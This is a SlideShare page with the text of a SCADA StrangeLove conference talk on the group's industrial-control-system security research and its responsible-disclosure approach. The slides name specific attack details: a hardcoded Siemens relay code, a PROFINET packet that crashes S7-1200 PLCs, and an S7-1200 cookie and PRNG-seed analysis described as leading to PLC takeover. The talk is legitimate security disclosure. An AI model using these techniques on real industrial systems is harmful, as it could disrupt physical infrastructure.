SlideShare uma empresa Scribd logo
1 de 73
*AllpicturesaretakenfromDr
StrangeLovemovieandother
Internets
Sergey Gordeychik
Aleksandr Timorin
Gleb Gritsai
SCADA STRANGELOVE
SCADA.SL
Aleksandr Timorin lifecycle:
 Studied mathematics (OMG!)
 Python developer
 Penetration tester
 ICS security researcher:
• Industrial protocols fan and 0-day PLC hunter
• SCADAStrangeLove team member
atimorin
atimorin@protonmail.ch
 WWW: who are we, why are we and what are we for ?
 Milestone
 Projects:
• Past
• Present
• Future
 Results
 Group of security researchers focused on ICS/SCADA
to save Humanity from industrial disaster
and to keep Purity Of Essence
Alexander Timorin
Alexander Tlyapov
Alexander Zaitsev
Alexey Osipov
Andrey Medov
Artem Chaykin
Denis Baranov
Dmitry Efanov
Dmitry Nagibin
Dmitry Serebryannikov
Dmitry Sklyarov
Evgeny Ermakov
Gleb Gritsai
Ilya Karpov
Ivan Poliyanchuk
Kirill Nesterov
Roman Ilin
Sergey Bobrov
Sergey Drozdov
Sergey Gordeychik
Sergey Scherbel
Timur Yunusov
Valentin Shilnenkov
Vladimir Kochetkov
Vyacheslav Egoshin
Yuri Goltsev
Yuriy Dyachenko
 We work for community and as community
Since Stuxnet (2010) ICS industry especially security has been
warned.
• ICS is everywhere
• Old technologies without classic and modern security
principles
• ICS networks “isolated”, but connected to other nets, other
nets connected to Internet
• Sometimes (shodan/censys/zmap/masscan proved) ICS
devices connected to the Internet directly
• Hacking ICS without money does not attract evil guy
• Engineers tend to say “this works for a long period of time!
Don’t touch it!”
• But reality shows us that evil guys touch them and ICS so
tender
• We was worried about it.
• We didn’t accept this approach.
• We decided to change situation.
• Then SCADASTRANGELOVE was born
Peace is our profession!
 As a group of researchers we work in different companies
 Not only one company with private atmosphere
 Everybody can be a member
Members has their own projects but still contributing to long-
term projects #SCADAPASS and #SCADASOS
 We regularly give a talks worldwide in security conferences:
CCC, Power of Community, CodeBlue, PacSec, PHDays,
Zeronights, Confidence, Hack.lu …
 We show and share our results with community
 We share researches of our projects
 We share toolkits, scripts, dorks, analytics and statistics
 2012: only 4 members
 From 2013 to 2016: over 30 members
 Over 100 0-dayz
 Tons of vulnerabilities: binary, web, default credentials and
so on
 Different industries: from transportation to renewable energy
Vulnerabilities:
• Memory errors
• Cryptofails
• Web
• Special “features” (aka backdoors)
• Default and hardcoded credentials
• Industrial protocols
• Fun but non-profit
Vulnerabilities:
• Siemens
• General electric
• Schneider electric
• Yokogawa
• Honeywell
• Abb
• Advantech
• etc
Vulnerabilities:
• Server/client scada software
• PLC, HMI, RTU
• Protective relays, actuators, converters
• Smart meters, data concentrators
• Network switches, gateways
• Gsm/gprs modems
• etc
• Honeywell EPKS, CVE-2014-9189
• Honeywell EPKS, CVE-2014-9187
• cb is a buffer size
• SpiderControl SCADA Web Server, stack-based bof, CVE-
2015-1001
to get firmware?
to get debug symbols?
to debug?
..PowerPC
no “operation system”
• Siemens SIPROTEC 7SJ64 (protective relay) XSS
• Siemens WinCC
WinCCExplorer.exe/PdlRt.exe
Create and use your own security features
Instead of standard features – that’s
A bad idea!
• Hardcodes are for protocols with auth: SNMP, telnet, HTTP,
etc.
• You can hardcode keys, certificates, passwords
• SMA Sunny WebBox
• Siemens SIPROTEC 4 protective relay confirmation code
“311299”:
- System log
- Device info
- Stack and other
parts of memory
- More ?
• Siemens SIPROTEC 4 protective relay confirmation code
“311299”:
“SIPROTEC 4 and SIPROTEC Compact devices allow the
display of extended internal statistics and test information…
To access this information, the confirmation code “311299” needs
to be provided when prompted.”
“...Siemens does not publish official documentation on these
statistics. It is strongly recommended to work together with
Siemens SIPROTEC customer care or commissioning experts to
retrieve and interpret the statistics and test information...”
• Siemens S7-1200 PLC, CVE-2014-2252
“An attacker could cause the device to go into defect mode if
specially crafted PROFINET packets are sent to the device. A
cold restart is required to recover the system. ”
Just “set” PROFINET request: set network info (ip, netmask,
gateway) with all zero values.
KIOSK mode:
Limit access to OS
functions
KIOSK mode: Limit access to OS functions
• Wincc accounts: “secret” crypto key
• WinCC accounts: “secret” crypto key fixed
• It’s XOR, they should not bother hardcoding for XOR
PLC password “encryption”
Password (8 bytes)
• TIA Portal PEData.plf passwords history
• Winccwebbridge.dll: please hash your hardcoded account
• Siemens S7-1200, S7-1500 PLC, CVE-2014-2250, CVE-
2014-2251
• Siemens S7-1200, S7-1500 PLC, CVE-2014-2250, CVE-
2014-2251
• Seed = plc_start_time + const
Target – Siemens S7-1200 PLC
PmzR9733Q8rG3LpwjCGZT9N/ocMAAQABAAKK1woAqsgAAAAAAAAAAIrXIUM=
uLiHXZUTy2GMgjr1KmgmcNN/ocMAAQACAAKK1woAqsgAAAAAAAAAAIrXIUM=
Mu/vgiIgtrxq0LVp26nkMtN/ocMAAQADAAKK1woAqsgAAAAAAAAAAIrXIUM=
tjH6vtNWCfa+QZHPDtCnKdN/ocMAAgADAAKK1woAqsgAAAAAAAAAAIrXIUM=
3e6cd1f7bdf743cac6dcba708c21994fd37fa1c30001000100028ad70a00aac800000000000000008ad72143
b8b8875d9513cb618c823af52a682670d37fa1c30001000200028ad70a00aac800000000000000008ad72143
32efef822220b6bc6ad0b569dba9e432d37fa1c30001000300028ad70a00aac800000000000000008ad72143
b631fabed35609f6be4191cf0ed0a729d37fa1c30002000300028ad70a00aac800000000000000008ad72143
3e6cd1f7bdf743cac6dcba708c21994f MD5 of ? (16bytes)
d37fa1c3 CONST (4 bytes)
0001 user logout counter (2 bytes)
0001 counter of issued cookies for this user (2
bytes)
00028ad7 value that doesn’t matter (4 bytes)
0a00aac8 user IP address (10.0.170.200) (4 bytes)
00000000000000008ad72143 value that doesn’t matter (12 bytes)
What about 3e6cd1f7bdf743cac6dcba708c21994f ?
MD5( NEXT 26 BYTES OF COOKIE + 16BYTES OF SECRET + 2 NULL BYTES)
What is SECRET ?
SECRET generates after PLC start by ~PRNG.
PRNG is a little bit harder than standard C PRNG.
SEED in {0x0000 , 0xFFFF}
SEED very often depends on time value
SEED = PLC START TIME + 320
320 by practical way: secret generates after ~ 3-4 seconds of PLC start using
current time
PLC START TIME = CURRENT TIME – UPTIME
Current time via web interface
Uptime via SNMP with hardcoded
read community string “public”
Profinet “feature” and PRNG vulnerability - real attack vector.
Result - PLC takeover.
- Hash passwords
- SHA is not good enough
- Put length of plaintext nearby
Redbox_value = len(pwd)*2+1
“Secure” set up speed of energetic turbine
More details at “SCADA deep inside: protocols and security
mechanisms”
Industrial protocols: S7-300 PLC password cracker.
Included in the popular tool thc-hydra.
Don’t patch too much
Wait a second….
 We work with responsible disclosure approach
 Full disclosure = all vuln details immediately in the wild.
Giving the vendors absolutely no opportunity to release a fix
 Responsible disclosure = researcher contacts the vendor
before the vulnerability is released. And all stakeholders
agree to allow a period of time for the vulnerability to be
patched before publishing the details.
 Because vulnerability patching very important for ICS and
can take months. Even years.
 That’s why responsible disclosure in ICS highly important
1. Research
2. We send details directly to vendor and CERT
3. Vendor create CVE
4. Vulnerability patched
5. SCADASL public disclosure and exploit/toolkit publishing
6. Applause to SCADASL
7. Research
8. …
Analytics every year:
 ICSMAP
 ICSDORKS
 #SCADAPASS
• Release 1.2
• 37 vendors
• PLC, RTU, gateways, switches, servers …
 #SCADASOS
(un)Secure Open SmartGrids is open initiative to rise
awareness on insecurities of SmartGrid, Photovoltaic Power
Stations and Wind Farms
Q: How to participate
A: Find Internet-connected PV and Wind power stations and notify vendors/CERTs/community.
Q: Wow! It simple! Can I hack it?
A: No. It can be a hospital or your grandma’s cottage. Please use passive approach (firmware analysis, testbeds etc.)
Q: I get an 0day!
A: Please submit it to vendor and/or regional CERT
Q: What will I get?
A: Kudos at SCADA StrangeLove Talks/Knowledge/Safer World.
Details
You can make shodan saved search or drop google dorks to twitter
Please use tags #solar #wind #scadasos
 60 000+ SmartGrid devices disconnected from the Internet
 Two Advisories
• XZERES 442SR Wind Turbine CSRF
• SMA Solar Technology AG Sunny WebBox Hard-Coded
Account Vulnerability
Current and future:
 Smart energy generation
 Rail road and signaling systems
 Digital substations
 GSM/GPRS modems
 Well-known and habitual world of information security
growing up, evolving, changing quickly
 Because a lot of specialists involved in it
 Unfortunately ICS security area not very mobile and
changeable
 Also our team members growing old, starting a families
 We think that our mission done successfully
 But not finished yet….
Still trying to hack ICS, son?
Have you ever heard
about
SCADASTRANGELOVE ?!
 All materials at SCADA.SL
 We hope that our work can help you create your own
projects. But don’t forget about community and responsible
disclosure principle
*Allpicturesaretakenfrom
googleandotherInternets
Alexander Timorin
Alexander Tlyapov
Alexander Zaitsev
Alexey Osipov
Andrey Medov
Artem Chaykin
Denis Baranov
Dmitry Efanov
Dmitry Nagibin
Dmitry Serebryannikov
Dmitry Sklyarov
Evgeny Ermakov
Gleb Gritsai
Ilya Karpov
Ivan Poliyanchuk
Kirill Nesterov
Roman Ilin
Sergey Bobrov
Sergey Drozdov
Sergey Gordeychik
Sergey Scherbel
Timur Yunusov
Valentin Shilnenkov
Vladimir Kochetkov
Vyacheslav Egoshin
Yuri Goltsev
Yuriy Dyachenko

Mais conteúdo relacionado

Mais procurados

Scada Industrial Control Systems Penetration Testing
Scada Industrial Control Systems Penetration Testing Scada Industrial Control Systems Penetration Testing
Scada Industrial Control Systems Penetration Testing Yehia Mamdouh
 
The journey to ICS - Extended
The journey to ICS - Extended The journey to ICS - Extended
The journey to ICS - Extended Larry Vandenaweele
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 
Hacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS securityHacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS securityChris Sistrunk
 
Projects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the CenterProjects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the CenterMITRE ATT&CK
 
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...arnaudsoullie
 
Recon: Hopeless relay protection for substation automation
Recon: Hopeless relay protection for substation automation  Recon: Hopeless relay protection for substation automation
Recon: Hopeless relay protection for substation automation Sergey Gordeychik
 
Beaglebone Black Introduction with Architecture and Code
Beaglebone Black Introduction with Architecture and CodeBeaglebone Black Introduction with Architecture and Code
Beaglebone Black Introduction with Architecture and CodeDevanshu Saxena
 
(Mis)trusting and (ab)using ssh
(Mis)trusting and (ab)using ssh(Mis)trusting and (ab)using ssh
(Mis)trusting and (ab)using sshmorisson
 
ICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghOWASP Delhi
 
CNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationCNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationSam Bowne
 
DEF CON 23 - NSM 101 for ICS
DEF CON 23 - NSM 101 for ICSDEF CON 23 - NSM 101 for ICS
DEF CON 23 - NSM 101 for ICSChris Sistrunk
 
Intro to Pentesting Jenkins
Intro to Pentesting JenkinsIntro to Pentesting Jenkins
Intro to Pentesting JenkinsBrian Hysell
 
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat SheetICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat Sheetqqlan
 
Nozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks SCADAguardian - Data-SheetNozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks SCADAguardian - Data-SheetNozomi Networks
 

Mais procurados (20)

Scada Industrial Control Systems Penetration Testing
Scada Industrial Control Systems Penetration Testing Scada Industrial Control Systems Penetration Testing
Scada Industrial Control Systems Penetration Testing
 
Introduction to ICS/SCADA security
Introduction to ICS/SCADA securityIntroduction to ICS/SCADA security
Introduction to ICS/SCADA security
 
Securing SCADA
Securing SCADA Securing SCADA
Securing SCADA
 
The journey to ICS - Extended
The journey to ICS - Extended The journey to ICS - Extended
The journey to ICS - Extended
 
CEH-brochure.pdf
CEH-brochure.pdfCEH-brochure.pdf
CEH-brochure.pdf
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration Testing
 
Hacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS securityHacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS security
 
Projects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the CenterProjects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the Center
 
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
 
Recon: Hopeless relay protection for substation automation
Recon: Hopeless relay protection for substation automation  Recon: Hopeless relay protection for substation automation
Recon: Hopeless relay protection for substation automation
 
Esp8266 basics
Esp8266 basicsEsp8266 basics
Esp8266 basics
 
Beaglebone Black Introduction with Architecture and Code
Beaglebone Black Introduction with Architecture and CodeBeaglebone Black Introduction with Architecture and Code
Beaglebone Black Introduction with Architecture and Code
 
(Mis)trusting and (ab)using ssh
(Mis)trusting and (ab)using ssh(Mis)trusting and (ab)using ssh
(Mis)trusting and (ab)using ssh
 
ICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep Singh
 
CNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationCNIT 123: 6: Enumeration
CNIT 123: 6: Enumeration
 
DEF CON 23 - NSM 101 for ICS
DEF CON 23 - NSM 101 for ICSDEF CON 23 - NSM 101 for ICS
DEF CON 23 - NSM 101 for ICS
 
Intro to Pentesting Jenkins
Intro to Pentesting JenkinsIntro to Pentesting Jenkins
Intro to Pentesting Jenkins
 
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat SheetICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
 
Nozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks SCADAguardian - Data-SheetNozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks SCADAguardian - Data-Sheet
 

Semelhante a Attacking SCADA systems: Story Of SCADASTRANGELOVE

CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...PROIDEA
 
Scada Strangelove - 29c3
Scada Strangelove - 29c3Scada Strangelove - 29c3
Scada Strangelove - 29c3qqlan
 
CLASS 2018 - Palestra de Shad Harris (Senior Subject Matter Expert on Securit...
CLASS 2018 - Palestra de Shad Harris (Senior Subject Matter Expert on Securit...CLASS 2018 - Palestra de Shad Harris (Senior Subject Matter Expert on Securit...
CLASS 2018 - Palestra de Shad Harris (Senior Subject Matter Expert on Securit...TI Safe
 
Safety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemSafety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemAleksandr Timorin
 
Cybersecurity of SmartGrid by Sergey Gordeychik & Alexander Timorin - CODE BL...
Cybersecurity of SmartGrid by Sergey Gordeychik & Alexander Timorin - CODE BL...Cybersecurity of SmartGrid by Sergey Gordeychik & Alexander Timorin - CODE BL...
Cybersecurity of SmartGrid by Sergey Gordeychik & Alexander Timorin - CODE BL...CODE BLUE
 
Encryption in industrial control systems; Is the juice worth the squeeze?
Encryption in industrial control systems; Is the juice worth the squeeze?Encryption in industrial control systems; Is the juice worth the squeeze?
Encryption in industrial control systems; Is the juice worth the squeeze?Brian Proctor - GICSP, CISSP, CRISC
 
Using DDS to Secure the Industrial Internet of Things (IIoT)
Using DDS to Secure the Industrial Internet of Things (IIoT)Using DDS to Secure the Industrial Internet of Things (IIoT)
Using DDS to Secure the Industrial Internet of Things (IIoT)Gerardo Pardo-Castellote
 
Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18  "Hacking Electronic Door Access Controllers" Defcon 18  "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers" shawn_merdinger
 
Mark Horowitz - Stanford Engineering - Securing the Internet of Things
Mark Horowitz - Stanford Engineering - Securing the Internet of ThingsMark Horowitz - Stanford Engineering - Securing the Internet of Things
Mark Horowitz - Stanford Engineering - Securing the Internet of ThingsStanford School of Engineering
 
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]qqlan
 
Io t security defense in depth charles li v1 20180425c
Io t security defense in depth charles li v1 20180425cIo t security defense in depth charles li v1 20180425c
Io t security defense in depth charles li v1 20180425cCharles Li
 
BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.Jakub Kałużny
 
BSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA DefenseBSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA DefenseChris Sistrunk
 
Automatski - The Internet of Things - Security in IoT
Automatski - The Internet of Things - Security in IoTAutomatski - The Internet of Things - Security in IoT
Automatski - The Internet of Things - Security in IoTautomatskicorporation
 
Cyber security and Industry.pptx
Cyber security and Industry.pptxCyber security and Industry.pptx
Cyber security and Industry.pptxSabahat Waheed
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Jakub Kałużny
 
Cybersecurity for Field IIoT Networks
Cybersecurity for Field IIoT NetworksCybersecurity for Field IIoT Networks
Cybersecurity for Field IIoT NetworksYokogawa1
 
Security from sensor to sunset. “How to approach the security in the IoT ecos...
Security from sensor to sunset. “How to approach the security in the IoT ecos...Security from sensor to sunset. “How to approach the security in the IoT ecos...
Security from sensor to sunset. “How to approach the security in the IoT ecos...Data Driven Innovation
 

Semelhante a Attacking SCADA systems: Story Of SCADASTRANGELOVE (20)

CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
CONFidence 2014: Alexander Timorin: SCADA deep inside: protocols and security...
 
Scada Strangelove - 29c3
Scada Strangelove - 29c3Scada Strangelove - 29c3
Scada Strangelove - 29c3
 
CLASS 2018 - Palestra de Shad Harris (Senior Subject Matter Expert on Securit...
CLASS 2018 - Palestra de Shad Harris (Senior Subject Matter Expert on Securit...CLASS 2018 - Palestra de Shad Harris (Senior Subject Matter Expert on Securit...
CLASS 2018 - Palestra de Shad Harris (Senior Subject Matter Expert on Securit...
 
Safety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemSafety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical System
 
Cybersecurity of SmartGrid by Sergey Gordeychik & Alexander Timorin - CODE BL...
Cybersecurity of SmartGrid by Sergey Gordeychik & Alexander Timorin - CODE BL...Cybersecurity of SmartGrid by Sergey Gordeychik & Alexander Timorin - CODE BL...
Cybersecurity of SmartGrid by Sergey Gordeychik & Alexander Timorin - CODE BL...
 
Encryption in industrial control systems; Is the juice worth the squeeze?
Encryption in industrial control systems; Is the juice worth the squeeze?Encryption in industrial control systems; Is the juice worth the squeeze?
Encryption in industrial control systems; Is the juice worth the squeeze?
 
Using DDS to Secure the Industrial Internet of Things (IIoT)
Using DDS to Secure the Industrial Internet of Things (IIoT)Using DDS to Secure the Industrial Internet of Things (IIoT)
Using DDS to Secure the Industrial Internet of Things (IIoT)
 
Defcon 18 "Hacking Electronic Door Access Controllers"
Defcon 18  "Hacking Electronic Door Access Controllers" Defcon 18  "Hacking Electronic Door Access Controllers"
Defcon 18 "Hacking Electronic Door Access Controllers"
 
Mark Horowitz - Stanford Engineering - Securing the Internet of Things
Mark Horowitz - Stanford Engineering - Securing the Internet of ThingsMark Horowitz - Stanford Engineering - Securing the Internet of Things
Mark Horowitz - Stanford Engineering - Securing the Internet of Things
 
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]
 
Io t security defense in depth charles li v1 20180425c
Io t security defense in depth charles li v1 20180425cIo t security defense in depth charles li v1 20180425c
Io t security defense in depth charles li v1 20180425c
 
IoT security zigbee -- Null Meet bangalore
IoT security zigbee -- Null Meet bangaloreIoT security zigbee -- Null Meet bangalore
IoT security zigbee -- Null Meet bangalore
 
BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.
 
BSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA DefenseBSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA Defense
 
Automatski - The Internet of Things - Security in IoT
Automatski - The Internet of Things - Security in IoTAutomatski - The Internet of Things - Security in IoT
Automatski - The Internet of Things - Security in IoT
 
Cyber security and Industry.pptx
Cyber security and Industry.pptxCyber security and Industry.pptx
Cyber security and Industry.pptx
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
 
Cybersecurity for Field IIoT Networks
Cybersecurity for Field IIoT NetworksCybersecurity for Field IIoT Networks
Cybersecurity for Field IIoT Networks
 
ICS Threat Scenarios
ICS Threat ScenariosICS Threat Scenarios
ICS Threat Scenarios
 
Security from sensor to sunset. “How to approach the security in the IoT ecos...
Security from sensor to sunset. “How to approach the security in the IoT ecos...Security from sensor to sunset. “How to approach the security in the IoT ecos...
Security from sensor to sunset. “How to approach the security in the IoT ecos...
 

Último

Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoKayode Fayemi
 
Unlocking Exploration: Self-Motivated Agents Thrive on Memory-Driven Curiosity
Unlocking Exploration: Self-Motivated Agents Thrive on Memory-Driven CuriosityUnlocking Exploration: Self-Motivated Agents Thrive on Memory-Driven Curiosity
Unlocking Exploration: Self-Motivated Agents Thrive on Memory-Driven CuriosityHung Le
 
Dreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video TreatmentDreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video Treatmentnswingard
 
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...amilabibi1
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar TrainingKylaCullinane
 
Jual obat aborsi Jakarta 085657271886 Cytote pil telat bulan penggugur kandun...
Jual obat aborsi Jakarta 085657271886 Cytote pil telat bulan penggugur kandun...Jual obat aborsi Jakarta 085657271886 Cytote pil telat bulan penggugur kandun...
Jual obat aborsi Jakarta 085657271886 Cytote pil telat bulan penggugur kandun...ZurliaSoop
 
Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIINhPhngng3
 
Digital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of DrupalDigital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of DrupalFabian de Rijk
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfSkillCertProExams
 
SOLID WASTE MANAGEMENT SYSTEM OF FENI PAURASHAVA, BANGLADESH.pdf
SOLID WASTE MANAGEMENT SYSTEM OF FENI PAURASHAVA, BANGLADESH.pdfSOLID WASTE MANAGEMENT SYSTEM OF FENI PAURASHAVA, BANGLADESH.pdf
SOLID WASTE MANAGEMENT SYSTEM OF FENI PAURASHAVA, BANGLADESH.pdfMahamudul Hasan
 
My Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle BaileyMy Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle Baileyhlharris
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lodhisaajjda
 
Zone Chairperson Role and Responsibilities New updated.pptx
Zone Chairperson Role and Responsibilities New updated.pptxZone Chairperson Role and Responsibilities New updated.pptx
Zone Chairperson Role and Responsibilities New updated.pptxlionnarsimharajumjf
 
Introduction to Artificial intelligence.
Introduction to Artificial intelligence.Introduction to Artificial intelligence.
Introduction to Artificial intelligence.thamaeteboho94
 
Proofreading- Basics to Artificial Intelligence Integration - Presentation:Sl...
Proofreading- Basics to Artificial Intelligence Integration - Presentation:Sl...Proofreading- Basics to Artificial Intelligence Integration - Presentation:Sl...
Proofreading- Basics to Artificial Intelligence Integration - Presentation:Sl...David Celestin
 

Último (17)

Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac Folorunso
 
Unlocking Exploration: Self-Motivated Agents Thrive on Memory-Driven Curiosity
Unlocking Exploration: Self-Motivated Agents Thrive on Memory-Driven CuriosityUnlocking Exploration: Self-Motivated Agents Thrive on Memory-Driven Curiosity
Unlocking Exploration: Self-Motivated Agents Thrive on Memory-Driven Curiosity
 
Dreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video TreatmentDreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video Treatment
 
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar Training
 
Jual obat aborsi Jakarta 085657271886 Cytote pil telat bulan penggugur kandun...
Jual obat aborsi Jakarta 085657271886 Cytote pil telat bulan penggugur kandun...Jual obat aborsi Jakarta 085657271886 Cytote pil telat bulan penggugur kandun...
Jual obat aborsi Jakarta 085657271886 Cytote pil telat bulan penggugur kandun...
 
Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio III
 
in kuwait௹+918133066128....) @abortion pills for sale in Kuwait City
in kuwait௹+918133066128....) @abortion pills for sale in Kuwait Cityin kuwait௹+918133066128....) @abortion pills for sale in Kuwait City
in kuwait௹+918133066128....) @abortion pills for sale in Kuwait City
 
Digital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of DrupalDigital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of Drupal
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
 
SOLID WASTE MANAGEMENT SYSTEM OF FENI PAURASHAVA, BANGLADESH.pdf
SOLID WASTE MANAGEMENT SYSTEM OF FENI PAURASHAVA, BANGLADESH.pdfSOLID WASTE MANAGEMENT SYSTEM OF FENI PAURASHAVA, BANGLADESH.pdf
SOLID WASTE MANAGEMENT SYSTEM OF FENI PAURASHAVA, BANGLADESH.pdf
 
My Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle BaileyMy Presentation "In Your Hands" by Halle Bailey
